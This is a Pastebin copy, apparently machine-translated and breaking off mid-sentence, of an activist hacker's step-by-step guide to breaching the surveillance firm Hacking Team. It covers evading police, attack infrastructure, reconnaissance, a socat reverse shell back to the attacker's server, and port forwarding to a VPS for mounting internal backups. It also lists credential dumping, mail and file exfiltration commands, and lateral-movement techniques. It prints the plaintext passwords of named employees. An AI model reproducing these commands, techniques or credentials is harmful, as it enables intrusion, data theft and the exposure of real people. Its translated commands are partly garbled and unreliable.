SHARE
TWEET

How Hacking Team hacked!!!

finalshare Apr 16th, 2016 154 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.              ____ _ _ _ _ _
  2.                | | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
  3.                | | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
  4.                | _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
  5.                | _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
  6.                                                
  7.                                  A DIY Guide
  8.  
  9.  
  10.  
  11.                                  , -._, -._            
  12.                               _, - \ Or Ob /;          
  13.                              / `` |          
  14.                              | \ -., ___, / `      
  15.                               \ `-.__ / /,. \    
  16.                              / `-.__.- \` ./ \ '
  17.                             / / | ___ \, / '\
  18.                            ((| .- " '' / \ \`
  19.                             \ \ / ,, | \ _
  20.                              \ | o / o / \.
  21.                               \, / /
  22.                               (__`; -; '__ `) \\
  23.                               `// '` `||` `\
  24.                              _ // || __ _ _ __ _____
  25.                      .- "-._ (__) (__) .-." "- |. | | | | _ _ | |
  26.                     / \ / \ | | | _ | | | | |
  27.                     \ / \ / | | _ | | | |
  28.                      ` '` `------- --------'` __ | | _ | | _ | | _ | | __
  29.                                #AntiSec
  30.  
  31.  
  32.  
  33. - [1 - Introduction] ------------------------------------------- ----------------
  34.  
  35. You'll notice the language change since the last edition [1]. Speaking world
  36. English already has books, lectures, guides, and information about spare
  37. hacking. In this world there are many better I hackers, but unfortunately
  38. They squander their knowledge working for contractors "defense"
  39. for intelligence agencies to protect the banks and corporations and
  40. to defend the established order. The hacker culture was born in the US as a
  41. counterculture, but that source has remained in mere aesthetics - the rest has
  42. It has been assimilated. At least they can wear a shirt, dye her hair blue,
  43. hackers use their nicknames, and feel rebels while working for the
  44. system.
  45.  
  46. Before someone had to sneak into the offices to filter documents [2].
  47. a gun to rob a bank was needed. Today you can do it from
  48. bed with a laptop in hands [3] [4]. As the CNT said after the
  49. Gamma hack Group: "we try to take another step forward with new
  50. forms of struggle "[5]. The hack is a powerful tool, let us learn and
  51. let's fight!
  52.  
  53. [1] http://pastebin.com/raw.php?i=cRYvK4jb
  54. [2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
  55. [3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
  56. [4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
  57. [5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group
  58.  
  59.  
  60. - [2 - Hacking Team] ------------------------------------------ ----------------
  61.  
  62. Hacking Team was a company that helped governments to hack and spy on
  63. journalists, activists, political opponents, and other threats to their power
  64. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]. And, very occasionally, criminals and
  65. terrorists [12]. A Vincenzetti, CEO, liked to finish his post with
  66. the fascist slogan "boia chi molla". It would be more successful "boia RCS sells chi".
  67. They also claimed to have technology to solve the "problem" of Tor and
  68. darknet [13]. But seeing that I still have my freedom, I have my doubts about
  69. their effectiveness.
  70.  
  71. [1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
  72. [2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
  73. [3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
  74. [4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
  75. [5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
  76. [6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
  77. [7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
  78. [8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
  79. [9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
  80. [10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
  81. [11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
  82. [12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
  83. [13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web
  84.  
  85.  
  86. - [3 - Be careful out there] ---------------------------------------- ------
  87.  
  88. Unfortunately, our world is upside down. Enriches you do bad things
  89. and imprisons you do good things. Fortunately, thanks to the work
  90. hard for people such as "Tor project" [1], you can keep you from getting into the
  91. jail by a few simple guidelines:
  92.  
  93. 1) Encrypt your hard drive [2]
  94.  
  95.    I guess when the police arrive to impound your computer,
  96.    mean you've already made many mistakes, but better safe
  97.    than cure.
  98.  
  99. 2) Use a virtual machine and all traffic routed by Tor
  100.  
  101.    This accomplishes two things. First, that all connections are anonymized to
  102.    through the Tor network. Second, keep personal life and anonymous life
  103.    on different computers it helps you not to mix by accident.
  104.  
  105.    You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or something
  106.    personalized [6]. Here [7] there is a detailed comparison.
  107.  
  108. 3) (Optional) Do not connect directly to the Tor network
  109.  
  110.    Tor is not the panacea. You can correlate the hours that you are connected
  111.    Tor with the hours that your nickname is active hacker. There have also been
  112.    successful attacks against the network [8]. You can connect to the Tor network through
  113.    wifi others. Wifislax [9] is a Linux distribution with many
  114.    tools to get wifi. Another option is to connect to a VPN or
  115.    bridge node [10] before Tor, but is less secure because it still is
  116.    They may correlate with hacker activity internet activity
  117.    your home (this example was used as evidence against Jeremy Hammond
  118.    [eleven]).
  119.  
  120.    The reality is that even though Tor is not perfect, it works quite well.
  121.    When I was young and reckless, did many things without any protection (me
  122.    referring to hacking) other than Tor, police made it impossible
  123.    investigate, and I've never had problems.
  124.  
  125.  
  126. [1] https://www.torproject.org/
  127. [2] https://info.securityinabox.org/es/chapter-4
  128. [3] https://www.whonix.org/
  129. [4] https://tails.boum.org/
  130. [5] https://www.qubes-os.org/doc/privacy/torvm/
  131. [6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
  132. [7] https://www.whonix.org/wiki/Comparison_with_Others
  133. [8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
  134. [9] http://www.wifislax.com/
  135. [10] https://www.torproject.org/docs/bridges.html.en
  136. [eleven] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html
  137.  
  138.  
  139. ---- [3.1 - Infrastructure] ----------------------------------------- ----------
  140.  
  141. No hacking directly with output relays Tor. They are blacklisted,
  142. They are very slow, and you can not receive reverse connections. Tor serves to
  143. protect my anonymity while I connect to the infrastructure used for
  144. hack, which consists of:
  145.  
  146. 1) Domain Names
  147.  
  148.    Addresses used for command and control (C & C), and for tunnels
  149.    DNS for insured egress.
  150.  
  151. 2) Stable Servers
  152.  
  153.    It serves to C & C servers to receive reverse shells, to launch
  154.    attacks and keep the loot.
  155.  
  156. 3) Servers Hacked
  157.  
  158.    They serve as pivots to hide the IP of stable servers, and
  159.    when I want a quick connection without pivot. For example scan ports,
  160.    scan the whole internet, download a database with SQL injection,
  161.    etc.
  162.  
  163. Obviously you have to pay anonymously, as bitcoin (if you use it with
  164. watch out).
  165.  
  166.  
  167. ---- [3.2 - Allocation] ----------------------------------------- ---------------
  168.  
  169. Often in the news that have attributed an attack on a group of
  170. governmental hackers (the "APTs"), because they always use the same
  171. tools, leaving the same fingerprints, and even use the same
  172. infrastructure (domains, mail etc). They neglect because they can hack
  173. without legal consequences.
  174.  
  175. I did not want to make it easier for police work and relate what Hacking
  176. Team with hacks and nicknames of my daily work as a hacker glove
  177. black. So I used new servers and domains registered with new post
  178. and paid with new bitcoin address. In addition, only I used tools
  179. public and things that I wrote especially for this attack and changed my way
  180. to do some things to keep my normal forensic trace.
  181.  
  182.  
  183. - [4 - Gathering Information] ------------------------------------------ ---------
  184.  
  185. Although it can be tedious, this stage is very important, because the more
  186. larger the attack surface, the easier it will be to find a fault in a
  187. portion thereof.
  188.  
  189.  
  190. ---- [4.1 - Technical Information] ---------------------------------------- -------
  191.  
  192. Some tools and techniques are:
  193.  
  194. 1) Google
  195.  
  196.    You can find many unexpected things with a couple of good searches
  197.    picked. For example, the identity of DPR [1]. The bible of how to use
  198.    google to hack is the book "Google Hacking for Penetration Testers".
  199.    You can also find a brief summary in Spanish in [2].
  200.  
  201. 2) Enumeration of subdomains
  202.  
  203.    Often the primary domain of a company is hosted by a third party, and
  204.    you are getting the IP ranges of the company thanks to subdomains as
  205.    mx.company.com, ns1.company.com etc. Also, sometimes there are things that should not be
  206.    be exposed to "hidden" subdomains. Useful tools for
  207.    discover domains and subdomains are fierce [3], theHarvester [4] and
  208.    recon-ng [5].
  209.  
  210. 3) reverse lookups and searches whois
  211.  
  212.    With a reverse search using the whois information of a domain or range
  213.    IPs of a company, you can find others of their domains and ranges
  214.    IPs. To my knowledge, there is no free way to do reverse lookups
  215.    whois, apart from a "hack" with google:
  216.  
  217.    "Via della Moscova 13" site: www.findip-address.com
  218.    "Via della Moscova 13" site: domaintools.com
  219.  
  220. 4) Port scanning and fingerprinting
  221.  
  222.    Unlike other techniques, this speaks servers
  223.    company. I include in this section because it is not an attack, it is only for
  224.    gather information. The company IDS can generate an alert to
  225.    scan ports, but you do not have to worry because all internet
  226.    it is constantly being scanned.
  227.  
  228.    To scan, nmap [6] necessary, and can fingerprint most
  229.    services discovered. For companies with very long ranges of IPs,
  230.    ZMap [7] or masscan [8] are fast. WhatWeb [9] or BlindElephant [10]
  231.    You can fingerprint websites.
  232.  
  233. [1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
  234. [2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
  235. [3] http://ha.ckers.org/fierce/
  236. [4] https://github.com/laramies/theHarvester
  237. [5] https://bitbucket.org/LaNMaSteR53/recon-ng
  238. [6] https://nmap.org/
  239. [7] https://zmap.io/
  240. [8] https://github.com/robertdavidgraham/masscan
  241. [9] http://www.morningstarsecurity.com/research/whatweb
  242. [10] http://blindelephant.sourceforge.net/
  243.  
  244.  
  245. ---- [4.2 - Social Information] ---------------------------------------- --------
  246.  
  247. For social engineering, it is very useful to collect information about
  248. employees, their roles, contact information, operating system, browser,
  249. plugins, software, etc. Some resources are:
  250.  
  251. 1) Google
  252.  
  253.    Here too, it is the most useful tool.
  254.  
  255. 2) theHarvester and recon-ng
  256.  
  257.    I have already mentioned in the previous section, but have much more
  258.    functionality. You can find a lot of information quickly and
  259.    automated. Worth reading all documentation.
  260.  
  261. 3) LinkedIn
  262.  
  263.    You can find much information about the employees here. The
  264.    Company recruiters are more likely to accept your requests.
  265.  
  266. 4) Data.com
  267.  
  268.    Formerly known as jigsaw. You have the contact information of many
  269.    employees.
  270.  
  271. 5) Metadata file
  272.  
  273.    You can find lots of information about employees and their systems
  274.    metadata files that the company has published. helpful Tools
  275.    to find files on the website of the company and extract
  276.    Metadata is metagoofil [1] and FOCA [2].
  277.  
  278. [1] https://github.com/laramies/metagoofil
  279. [2] https://www.elevenpaths.com/es/labstools/foca-2/index.html
  280.  
  281.  
  282. - [5 - Entering the Network] ---------------------------------------- ------------
  283.  
  284. There are several ways to make entry. Since the method I used for hacking
  285. team is rare and much more work than is usually necessary,
  286. I'll talk a bit about the two most common methods, I recommend trying
  287. First.
  288.  
  289.  
  290. ---- [5.1 - Social Engineering] ---------------------------------------- ---------
  291.  
  292. social engineering, spear phishing specifically, is responsible for the
  293. Most hacking today. For an introduction in Spanish, see [1].
  294. For more information in English, see [2] (the third part, "Targeted
  295. Attacks "). For social engineering amusing anecdotes generations
  296. past, see [3]. I did not want to try spear phishing against Hacking Team,
  297. because your business is to help governments to spear phish their opponents.
  298. Therefore there is a much higher risk that recognize and Hacking Team
  299. investigate this attempt.
  300.  
  301. [1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
  302. [2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
  303. [3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf
  304.  
  305.  
  306. ---- [5.2 - Buy Access] ---------------------------------------- ------------
  307.  
  308. Thanks to painstaking Russians and their exploit kits, smugglers trafficking, and
  309. bot herders, many companies already have compromised computers within
  310. their networks. Almost all Fortune 500, with their huge networks have a
  311. bots already inside. However, Hacking Team is a very small company, and
  312. Most employees are experts in computer security, then there was
  313. little chance that were already committed.
  314.  
  315.  
  316. ---- [5.3 - Technical Operations] ---------------------------------------- -------
  317.  
  318. After hacking Gamma Group, I described a process to search
  319. vulnerabilities [1]. Hacking Team has a range of public IP:
  320. inetnum: 93.62.139.32 - 93.62.139.47
  321. descr: HT public subnet
  322.  
  323. Hacking Team had very little exposed to the internet. For example, different
  324. Gamma Group, your site customer needs a certificate
  325. client to connect. What he had was his main website (a blog Joomla
  326. that Joomscan [2] reveals no serious failure), a server post a
  327. pair of routers, two VPN devices, and a device for filtering spam.
  328. Then I had three options: find a 0day in Joomla, find a 0day in
  329. postfix, or find a 0day in one of the embedded systems. A 0day a
  330. embedded system seemed the most attainable option, and after two weeks
  331. reverse engineering work, I got a remote root exploit. Given the
  332. vulnerabilities have not yet been patched, I will not give more details.
  333. For more information on how to find these vulnerabilities, see
  334. [3] and [4].
  335.  
  336. [1] http://pastebin.com/raw.php?i=cRYvK4jb
  337. [2] http://sourceforge.net/projects/joomscan/
  338. [3] http://www.devttys0.com/
  339. [4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A
  340.  
  341.  
  342. - [6 - Be Prepared] ------------------------------------------ -------------
  343.  
  344. I did a lot of work and testing before using the exploit against Hacking Team.
  345. I wrote a backdoor firmware, and compiled several tools
  346. post-exploitation for embedded system. The backdoor serves to protect the
  347. exploit. Use the exploit only once and then return by the backdoor ago
  348. work harder to find and patch vulnerabilities.
  349.  
  350. The post-exploitation tools he had prepared were:
  351.  
  352. 1) busybox
  353.  
  354.    For all common UNIX utilities that the system did not.
  355.  
  356. 2) nmap
  357.  
  358.    To scan and fingerprint the internal network of Hacking Team.
  359.  
  360. 3) Responder.py
  361.  
  362.    The most useful tool to attack Windows networks when you have access to
  363.    the internal network but do not have a domain user.
  364.  
  365. 4) Python
  366.  
  367.    To run Responder.py
  368.  
  369. 5) tcpdump
  370.  
  371.    To snoop traffic.
  372.  
  373. 6) dsniff
  374.  
  375.    Weak passwords to spy protocols such as ftp, and to make
  376.    ARP spoofing. I wanted to use ettercap, written by the same ALOR and naga
  377.    Hacking Team, but it was difficult to compile for the system.
  378.  
  379. 7) socat
  380.  
  381.    For a comfortable shell with pty:
  382.    my_server: socat file: `tty`, raw, echo = 0 tcp-listen: mi_puerto
  383.    Hacked system: socat exec: 'bash -li' pty, stderr, setsid, SIGINT, heal \
  384.                   tcp: my_server: I mi_puerto
  385.  
  386.    And for many other things, it is a Swiss Army knife of networking. See section
  387.    Examples of documentation.
  388.  
  389. 8) screen
  390.  
  391.    As socat pty is not strictly necessary, but I wanted to feel
  392.    at home in networks Hacking Team.
  393.  
  394. 9) a SOCKS proxy server
  395.  
  396.    To use with proxychains to access the internal network with any
  397.    another program.
  398.  
  399. 10) tgcd
  400.  
  401.    To forward ports, as SOCKS server through the firewall.
  402.  
  403. [1] https://www.busybox.net/
  404. [2] https://nmap.org/
  405. [3] https://github.com/SpiderLabs/Responder
  406. [4] https://github.com/bendmorris/static-python
  407. [5] http://www.tcpdump.org/
  408. [6] http://www.monkey.org/~dugsong/dsniff/
  409. [7] http://www.dest-unreach.org/socat/
  410. [8] https://www.gnu.org/software/screen/
  411. [9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
  412. [10] http://tgcd.sourceforge.net/
  413.  
  414.  
  415. The worst that could happen was that my backdoor or post-exploitation tools
  416. dejasen unstable the system and make an employee to investigate. By
  417. So I spent a week trying my exploit, backdoor, and tools
  418. post-operation over networks of other vulnerable companies before entering
  419. Network Hacking Team.
  420.  
  421.  
  422. - [7 - Look and Listen] ----------------------------------------- ----------
  423.  
  424. Now within the internal network, I want to take a look and think before giving
  425. the next step. I turn Responder.py in analysis mode (-A, to listen without
  426. Poisoned answers), and make a slow scan with nmap.
  427.  
  428.  
  429. - [8 - NoSQL databases] ---------------------------------------- ----------
  430.  
  431. NoSQL, or rather NoAutenticación has been a great gift to the community
  432. hacker [1]. When I worry that they have finally patched all failures
  433. Authentication Bypass in MySQL [2] [3] [4] [5] put new fashion base
  434. Data unauthenticated by design. Nmap is a few on the net
  435. Internal Hacking Team:
  436.  
  437. 27017 / tcp open MongoDB MongoDB 2.6.5
  438. | mongodb-databases:
  439. | ok = 1
  440. | totalSizeMb = 47547
  441. | totalSize = 49856643072
  442. ...
  443. | _ Version = 2.6.5
  444.  
  445. 27017 / tcp open MongoDB MongoDB 2.6.5
  446. | mongodb-databases:
  447. | ok = 1
  448. | totalSizeMb = 31987
  449. | totalSize = 33540800512
  450. | DATABASES
  451. ...
  452. | _ Version = 2.6.5
  453.  
  454. Were the databases for RCS test instances. The audio recording
  455. RCS is stored in MongoDB with GridFS. The audio folder on torrent [6]
  456. It comes from this. Unwittingly they spied on themselves.
  457.  
  458. [1] https://www.shodan.io/search?query=product%3Amongodb
  459. [2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
  460. [3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
  461. [4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
  462. [5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
  463. [6] https://ht.transparencytoolkit.org/audio/
  464.  
  465.  
  466. - [9 - Cables Cruzados] ------------------------------------------ -------------
  467.  
  468. Although it was fun to listen to recordings and view images Hacking webcam
  469. Team developing its malware was not very useful. Unsteady copies of
  470. security vulnerability were opened. according to his
  471. documentation [1], its iSCSI devices must be on a separate network,
  472. but nmap find some in your 192.168.1.200/24 ​​subnet:
  473.  
  474. Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
  475. ...
  476. 3260 / tcp open iscsi?
  477. | iscsi-info:
  478. | Target: iqn.2000-01.com.synology: ht-synology.name
  479. | Address: 192.168.200.66:3260,0
  480. | _ Authentication: No authentication required
  481.  
  482. Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
  483. ...
  484. 3260 / tcp open iscsi?
  485. | iscsi-info:
  486. | Target: iqn.2000-01.com.synology: synology-backup.name
  487. | Address: 10.0.1.72:3260,0
  488. | Address: 192.168.200.72:3260,0
  489. | _ Authentication: No authentication required
  490.  
  491. iSCSI requires a kernel module, and compile it would have been difficult for the
  492. embedded system. I forwarded the port to mount from a VPS:
  493.  
  494. VPS: tgcd -L -p 3260 -q 42838
  495. Embedded system: tgcd -C -s -c 192.168.200.72:3260 VPS_IP: 42838
  496.  
  497. VPS: iscsiadm discovery -m -p -t 127.0.0.1 SendTargets
  498.  
  499. Now you find the name iqn.2000-01.com.synology iSCSI but has problems
  500. when mounting because he believes his address is 192.168.200.72 instead of
  501. 127.0.0.1
  502.  
  503. The way I solved was:
  504. iptables -t nat -A OUTPUT -d -j 192.168.200.72 DNAT --to-destination 127.0.0.1
  505.  
  506. And now after:
  507. -m node iscsiadm --targetname = iqn.2000-01.com.synology: 192.168.200.72 -p synology-backup.name --login
  508.  
  509. ... The device file appears! We ride:
  510. vmfs-fuse -o ro / dev / sdb1 / mnt / tmp
  511.  
  512. and we find backups of multiple virtual machines. The server
  513. Exchange seems most interesting. It is too large to download,
  514. but we can mount remote and look for interesting files:
  515. $ Losetup / dev / loop0 Exchange.hackingteam.com-flat.vmdk
  516. $ Fdisk -l / dev / loop0
  517. / Dev / loop0p1 2048 1258287103 629142528 7 HPFS / NTFS / exFAT
  518.  
  519. then the offset is 2048 * 512 = 1048576
  520. 1048576 $ losetup -o / dev / loop1 / dev / loop0
  521. $ Mount -o ro / dev / loop1 / mnt / exchange /
  522.  
  523. now in / mnt / exchange / WindowsImageBackup / EXCHANGE / Backup 172311 10/14/2014
  524. We find the hard drive of the virtual machine, and assemble:
  525. vdfuse -r -t -f VHD f0f78089-D28a-11e2-a92c-005056996a44.vhd / mnt / vhd-disk /
  526. mount -o loop / mnt / vhd-disk / Partition1 / mnt / part1
  527.  
  528. ... And finally we unpacked the doll and we can see all
  529. the old Exchange server files in / mnt / part1
  530.  
  531. [1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf
  532.  
  533.  
  534. - [10 - Backup to Domain Administrator] ---------------------
  535.  
  536. What interests me most about the backup is to look if you have a
  537. or hash password you can use to access the current server. Use pwdump,
  538. cachedump, and lsadump [1] with the registry files. lsadump is the
  539. password account besadmin service:
  540.  
  541. _SC_BlackBerry MDS Connection Service
  542. 0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
  543. 0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 bes3.2.6.7.8.
  544. 0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00!.!.! ...........
  545.  
  546. proxychains [2] use the SOCKS server and embedded system
  547. smbclient [3] to check the password:
  548. proxychains smbclient //192.168.100.51/c$ '-U' hackingteam.local / besadmin% bes32678 !!! '
  549.  
  550. !Works! Besadmin password is still valid, and is an administrator
  551. local. I use my proxy and psexec_psh metasploit [4] for a session
  552. of meterpreter. Then I migrate to a 64-bit process, "load kiwi" [5]
  553. "Creds_wdigest", and I have many passwords, including the Administrator
  554. domain:
  555.  
  556. HACKINGTEAM BESAdmin bes32678 !!!
  557. HACKINGTEAM Administrator uu8dd8ndd12!
  558. HACKINGTEAM c.pozzi P4ssword <---- sysadmin go!
  559. M.romeo HACKINGTEAM ioLK / (90
  560. L.guerra HACKINGTEAM 4luc@=.=
  561. HACKINGTEAM D.Martinez W4tudul3sp
  562. HACKINGTEAM g.russo GCBr0s0705!
  563. A.scarafile HACKINGTEAM Cd4432996111
  564. HACKINGTEAM r.viscardi Ht2015!
  565. HACKINGTEAM a.mino A! E $$ andra
  566. HACKINGTEAM m.bettini Ettore & Bella0314
  567. M.luppi HACKINGTEAM Blackou7
  568. HACKINGTEAM s.gallucci 1S9i8m4o!
  569. HACKINGTEAM d.milan set! Dob66
  570. HACKINGTEAM w.furlan Blu3.B3rry!
  571. HACKINGTEAM d.romualdi Rd13136f @ #
  572. HACKINGTEAM l.invernizzi L0r3nz0123!
  573. HACKINGTEAM e.ciceri 2O2571 & 2E
  574. HACKINGTEAM e.rabe erab @ 4HT!
  575.  
  576. [1] https://github.com/Neohapsis/creddump7
  577. [2] http://proxychains.sourceforge.net/
  578. [3] https://www.samba.org/
  579. [4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
  580. [5] https://github.com/gentilkiwi/mimikatz
  581.  
  582.  
  583. - [11 - Downloading Post] ----------------------------------------- ------
  584.  
  585. Now that I have the password for the domain administrator, I have access to
  586. mails, the heart of the company. Because with every step I take is a
  587. risk of detection, I download mails before further exploring.
  588. Powershell makes it easy [1]. Interestingly, I found a bug with handling
  589. dates. After getting the mail, I took a couple of weeks in
  590. get the source and other code, so I returned occasionally to
  591. download new emails. The server was Italian, with the dates
  592. day / month / year. Use:
  593. -ContentFilter {(Received -ge '05 / 06/2015 ') -or (Sent -ge '05 / 06/2015')}
  594.  
  595. with the New-MailboxExportRequest to download new mail (in this
  596. If all mail from June 5. The problem is that says
  597. the date is invalid if the day is greater than 12 (I guess this is because
  598. US that is the first month and month can not be greater than 12). Looks like
  599. Microsoft engineers have only tested their software with their own
  600. regional configuration.
  601.  
  602. [1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/
  603.  
  604.  
  605. - [12 - Downloading Files] ------------------------------------------ -------
  606.  
  607. Now I'm a domain administrator, I also began to download
  608. shares using my proxy and -Tc smbclient option for
  609. example:
  610.  
  611. proxychains smbclient //192.168.1.230/FAE DiskStation '\
  612.     -U 'HACKINGTEAM / Administrator% uu8dd8ndd12!' -TC FAE_DiskStation.tar '*'
  613.  
  614. So I downloaded the Amministrazione, FAE DiskStation, and FileServer folders
  615. the torrent.
  616.  
  617.  
  618. - [13 - Introduction to Hacking Windows Domain] -----------------------
  619.  
  620. Before continue telling the story of the Culiao Non-Windows, it should say something
  621. knowledge to attack Windows networks.
  622.  
  623.  
  624. ---- [13.1 - Lateral Movement] ---------------------------------------- -------
  625.  
  626. I will give a brief overview of the techniques to spread within a network
  627. Windows. Techniques to run remotely require the password or
  628. hash of a local administrator on the target. By far the most common way
  629. to get such credentials is to use mimikatz [1], especially
  630. logonpasswords and sekurlsa sekurlsa :: :: mSv, on computers where you already have
  631. administrative access. Movement techniques "in situ" also Require
  632. administrative privileges (I except for runes). The more tools
  633. important privilege escalation are PowerUp [2], and bypassuac [3].
  634.  
  635. [1] https://adsecurity.org/?page_id=1821
  636. [2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
  637. [3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1
  638.  
  639.  
  640. Remote movement:
  641.  
  642. 1) psexec
  643.  
  644.    The basic and proven way of moving windows networks. You can use
  645.    psexec [1], winexe [2], psexec_psh metasploit [3], invoke_psexec of
  646.    powershell empire [4], or the Windows command "sc" [5]. For module
  647.    metasploit, powershell empire, and pth-winexe [6], enough to know the hash
  648.    without knowing the password. It is the most universal way (works on any
  649.    computer with port 445 open), but also way less
  650.    cautious. It appears in the 7045 event log type "Service
  651.    Control Manager. "In my experience, they have never realized for a
  652.    hack, but sometimes you notice later and helps researchers understand
  653.    what has made the hacker.
  654.  
  655. 2) WMI
  656.  
  657.    more cautious way. WMI service is enabled on all
  658.    Windows computers, but except for servers, the firewall blocks it
  659.    default. You can use wmiexec.py [7] pth-WMIS [6] (here's a
  660.    wmiexec demonstration and pth-WMIS [8]), invoke_wmi empire powershell
  661.    [9], or the Windows command wmic [5]. All but need only wmic
  662.    hash.
  663.  
  664. 3) PSRemoting [10]
  665.  
  666.    It is disabled by default, and not advise enable new
  667.    protocols that are not needed. But if the sysadmin already enabled,
  668.    is very convenient, especially if you use powershell for all (and yes,
  669.    you should use powershell for almost everything will change [11] with powershell 5
  670.    and Windows 10, but now powershell day makes it easy to do everything in RAM,
  671.    dodge antivirus, and leave few traces).
  672.  
  673. 4) Scheduled Tasks
  674.  
  675.    You can run remote programs at and schtasks [5]. It works on the
  676.    psexec same situations, and also leaves traces known [12].
  677.  
  678. 5) GPO
  679.  
  680.    If all these protocols are disabled or blocked by
  681.    firewall, once you are the domain administrator, you can use GPO
  682.    to give a logon script, install a msi, run a scheduled task
  683.    [13], or as we shall see computer Mauro Romeo (sysadmin Hacking
  684.    Team), enable WMI and open the firewall via GPO.
  685.  
  686. [1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
  687. [2] https://sourceforge.net/projects/winexe/
  688. [3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
  689. [4] http://www.powershellempire.com/?page_id=523
  690. [5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
  691. [6] https://github.com/byt3bl33d3r/pth-toolkit
  692. [7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
  693. [8] https://www.trustedsec.com/june-2015/no_psexec_needed/
  694. [9] http://www.powershellempire.com/?page_id=124
  695. [10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
  696. [11] https://adsecurity.org/?p=2277
  697. [12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
  698. [13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py
  699.  
  700.  
  701. Movement "in situ"
  702.  
  703. 1) Impersonalizando Tokens
  704.  
  705.    Once you have administrative access to a computer, you can use the
  706.    tokens of other users to access resources in the domain. Two
  707.    tools to do this are incognito [1] and commands token :: * of
  708.    mimikatz [2].
  709.  
  710. 2) MS14-068
  711.  
  712.    You can take advantage of a validation failure kerberos to generate a
  713.    ticket domain administrator [3] [4] [5].
  714.  
  715. 3) Pass the Hash
  716.  
  717.    If you have your hash but the user has not logged on you can use
  718.    sekurlsa :: pth [2] for a ticket user.
  719.  
  720. 4) Injection Process
  721.  
  722.    Any RAT can be injected to another process, for example the command
  723.    pupy migrate in meterpreter and [6] or psinject [7] in powershell empire.
  724.    You can inject the process with the token you want.
  725.  
  726. 5) runes
  727.  
  728.    This is sometimes very useful because it does not require privileges
  729.    administrator. The command is part of windows, but if you have no interface
  730.    Graphics can use powershell [8].
  731.  
  732. [1] https://www.indetectables.net/viewtopic.php?p=211165
  733. [2] https://adsecurity.org/?page_id=1821
  734. [3] https://github.com/bidord/pykek
  735. [4] https://adsecurity.org/?p=676
  736. [5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
  737. [6] https://github.com/n1nj4sec/pupy
  738. [7] http://www.powershellempire.com/?page_id=273
  739. [8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1
  740.  
  741.  
  742. ---- [13.2 - Persistence] ----------------------------------------- ------------
  743.  
  744. Having gained access, you want to keep. Indeed, the persistence
  745. It's just a challenge for motherfuckers like they want Hacking Team
